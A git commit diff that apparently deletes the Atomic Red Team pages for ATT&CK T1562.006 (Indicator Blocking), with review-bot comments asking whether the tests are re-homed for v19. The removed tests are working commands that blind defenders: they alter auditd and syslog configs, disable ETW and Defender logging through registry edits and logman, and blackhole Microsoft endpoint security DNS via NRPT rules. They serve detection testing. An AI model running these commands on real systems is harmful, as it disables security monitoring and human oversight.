first pass at updates for MITRE ATT&CK v19

Phil Hagen
2026-04-28 20:37:38 -06:00
parent c7310aa427
commit 474f9a4aec
35 changed files with 970 additions and 1007 deletions
-407
@@ -1,407 +0,0 @@
# T1562.006 - Impair Defenses: Indicator Blocking
## Description from ATT&CK
> An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
>
> For example, adversaries may modify the `File` value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)
>
> ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.
>
> In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
>
> In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors. (Citation: LemonDuck) ESXi also leverages syslog, which can be reconfigured via commands such as `esxcli system syslog config set` and `esxcli system syslog config reload`.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Configuring syslog on ESXi)
[Source](https://attack.mitre.org/techniques/T1562/006)
## Atomic Tests
- [Atomic Test #1: Auditing Configuration Changes on Linux Host](#atomic-test-1-auditing-configuration-changes-on-linux-host)
- [Atomic Test #2: Auditing Configuration Changes on FreeBSD Host](#atomic-test-2-auditing-configuration-changes-on-freebsd-host)
- [Atomic Test #3: Logging Configuration Changes on Linux Host](#atomic-test-3-logging-configuration-changes-on-linux-host)
- [Atomic Test #4: Logging Configuration Changes on FreeBSD Host](#atomic-test-4-logging-configuration-changes-on-freebsd-host)
- [Atomic Test #5: Disable Powershell ETW Provider - Windows](#atomic-test-5-disable-powershell-etw-provider---windows)
- [Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd)](#atomic-test-6-disable-net-event-tracing-for-windows-via-registry-cmd)
- [Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell)](#atomic-test-7-disable-net-event-tracing-for-windows-via-registry-powershell)
- [Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd](#atomic-test-8-lockbit-black---disable-the-etw-provider-of-windows-defender--cmd)
- [Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell](#atomic-test-9-lockbit-black---disable-the-etw-provider-of-windows-defender--powershell)
- [Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd](#atomic-test-10-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---cmd)
- [Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell](#atomic-test-11-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---powershell)
- [Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd](#atomic-test-12-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---cmd)
- [Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell](#atomic-test-13-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---powershell)
- [Atomic Test #14: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table](#atomic-test-14-block-cybersecurity-communication-by-leveraging-windows-name-resolution-policy-table)
### Atomic Test #1: Auditing Configuration Changes on Linux Host
Emulates modification of auditd configuration files
**Supported Platforms:** Linux
**auto_generated_guid:** `212cfbcf-4770-4980-bc21-303e37abd0e3`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
```
#### Cleanup Commands
```bash
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
```
### Atomic Test #2: Auditing Configuration Changes on FreeBSD Host
Emulates modification of auditd configuration files
**Supported Platforms:** Linux
**auto_generated_guid:** `cedaf7e7-28ee-42ab-ba13-456abd35d1bd`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
```
#### Cleanup Commands
```sh
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
```
### Atomic Test #3: Logging Configuration Changes on Linux Host
Emulates modification of syslog configuration.
**Supported Platforms:** Linux
**auto_generated_guid:** `7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
#### Cleanup Commands
```bash
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
### Atomic Test #4: Logging Configuration Changes on FreeBSD Host
Emulates modification of syslog configuration.
**Supported Platforms:** Linux
**auto_generated_guid:** `6b8ca3ab-5980-4321-80c3-bcd77c8daed8`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
```
#### Cleanup Commands
```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
```
### Atomic Test #5: Disable Powershell ETW Provider - Windows
This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
**Supported Platforms:** Windows
**auto_generated_guid:** `6f118276-121d-4c09-bb58-a8fb4a72ee84`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;pstools&#92;PsExec.exe|
| session | The session to disable. | string | EventLog-Application|
| provider | The provider to disable. | string | Microsoft-Windows-Powershell|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
```
#### Cleanup Commands
```powershell
cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
```
#### Dependencies: Run with `powershell`!
##### Description: PSExec must be installed on the machine.
###### Check Prereq Commands
```powershell
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
```
### Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd)
Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
**Supported Platforms:** Windows
**auto_generated_guid:** `8a4c33be-a0d3-434a-bee6-315405edbd5b`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
```
#### Cleanup Commands
```cmd
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
```
### Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell)
Disables ETW for the .NET Framework using PowerShell to update the Windows registry
**Supported Platforms:** Windows
**auto_generated_guid:** `19c07a45-452d-4620-90ed-4c34fffbe758`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
```
#### Cleanup Commands
```powershell
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
```
### Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
**auto_generated_guid:** `f6df0b8e-2c83-44c7-ba5e-0fa4386bec41`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
```
### Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
**auto_generated_guid:** `69fc085b-5444-4879-8002-b24c8e1a3e02`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
```
### Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `fdac1f79-b833-4bab-b4a1-11b1ed676a4b`
#### Attack Commands: Run with `command_prompt`!
```cmd
REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
```
#### Cleanup Commands
```cmd
REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
```
### Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `b42c1f8c-399b-47ae-8fd8-763181395fee`
#### Attack Commands: Run with `powershell`!
```powershell
New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
```
### Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `110b4281-43fe-405f-a184-5d8eaf228ebf`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
```
#### Cleanup Commands
```cmd
REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
```
### Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `4d61779d-be7f-425c-b560-0cafb2522911`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
```
### Atomic Test #14: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
**Supported Platforms:** Windows
**auto_generated_guid:** `1174b5df-2c33-490f-8854-f5eb80c907ca`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
```
#### Cleanup Commands
```powershell
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCache
```
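Review bot: this hunk deletes the whole T1562.006 markdown page, all 14 atomics from `# T1562.006 - Impair Defenses: Indicator Blocking` down to the NRPT test at the end, with no replacement visible in this hunk; the commit message says only "first pass at updates for MITRE ATT&CK v19" while the diff summary shows 970 additions in the other changed files, so please state in the commit message whether these tests are re-homed under another technique for v19 or retired, so the deletion can be checked against the v19 change list. If they are re-homed, carry each `auto_generated_guid` over unchanged (it identifies the test independently of its name and position) and fix two inconsistencies on the way: Atomic Test #2 and Atomic Test #4 are titled "FreeBSD Host" but list `**Supported Platforms:** Linux`, and the NRPT cleanup runs `Clear-DnsClientCache` a second time after the try/catch block, which is redundant.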
-272
@@ -1,272 +0,0 @@
attack_technique: T1562.006
display_name: 'Impair Defenses: Indicator Blocking'
atomic_tests:
- name: 'Auditing Configuration Changes on Linux Host'
auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
description: |
Emulates modification of auditd configuration files
supported_platforms:
- linux
input_arguments:
audisp_config_file_name:
description: The name of the audispd configuration file to be changed
type: string
default: audispd.conf
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: auditd.conf
libaudit_config_file_name:
description: The name of the libaudit configuration file to be changed
type: string
default: libaudit.conf
executor:
command: |
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
cleanup_command: |
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
name: bash
elevation_required: true
- name: 'Auditing Configuration Changes on FreeBSD Host'
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
description: |
Emulates modification of auditd configuration files
supported_platforms:
- linux
input_arguments:
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: audit_event
executor:
command: |
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
cleanup_command: |
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
name: sh
elevation_required: true
- name: 'Logging Configuration Changes on Linux Host'
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
description: |
Emulates modification of syslog configuration.
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
rsyslog_config_file_name:
description: The name of the rsyslog configuration file to be changed
type: string
default: rsyslog.conf
syslog_ng_config_file_name:
description: The name of the syslog-ng configuration file to be changed
type: string
default: syslog-ng.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
name: bash
elevation_required: true
- name: 'Logging Configuration Changes on FreeBSD Host'
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
description: |
Emulates modification of syslog configuration.
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
name: sh
elevation_required: true
- name: Disable Powershell ETW Provider - Windows
auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
supported_platforms:
- windows
input_arguments:
ps_exec_location:
description: Location of PSExec.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe
session:
description: The session to disable.
type: string
default: EventLog-Application
provider:
description: The provider to disable.
type: string
default: Microsoft-Windows-Powershell
dependency_executor_name: powershell
dependencies:
- description: PSExec must be installed on the machine.
prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
executor:
command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Registry (cmd)
auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
description: Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
supported_platforms:
- windows
executor:
command: REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Registry (powershell)
auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
description: Disables ETW for the .NET Framework using PowerShell to update the Windows registry
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
name: powershell
elevation_required: true
- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
cleanup_command: |
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
name: command_prompt
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
name: powershell
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
name: powershell
elevation_required: true
- name: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca
description: Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
supported_platforms:
- windows
executor:
command: |-
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
cleanup_command: |-
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCache
name: powershell
elevation_required: true
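Review bot: the `cleanup_command` for "Disable Powershell ETW Provider - Windows" drops the `-accepteula` switch that the `command` line passes to PsExec (compare `cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe ...` with `cmd /c "#{ps_exec_location}" -i -s cmd.exe ...`); if cleanup is run on a host where the attack step did not already accept the EULA, PsExec stops at the EULA prompt instead of re-adding the provider, so both invocations should use the same switches. The same question as for the markdown applies here, since this hunk removes the YAML definitions for all 14 T1562.006 atomics: note in the commit message whether they are re-homed for v19 or retired, and if re-homed, give the two "FreeBSD Host" entries a `supported_platforms` value that matches their name rather than `- linux`.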
-82
@@ -1,82 +0,0 @@
# T1562 - Impair Defenses
## Description from ATT&CK
> Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
>
> Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
>
[Source](https://attack.mitre.org/techniques/T1562)
## Atomic Tests
- [Atomic Test #1: Windows Disable LSA Protection](#atomic-test-1-windows-disable-lsa-protection)
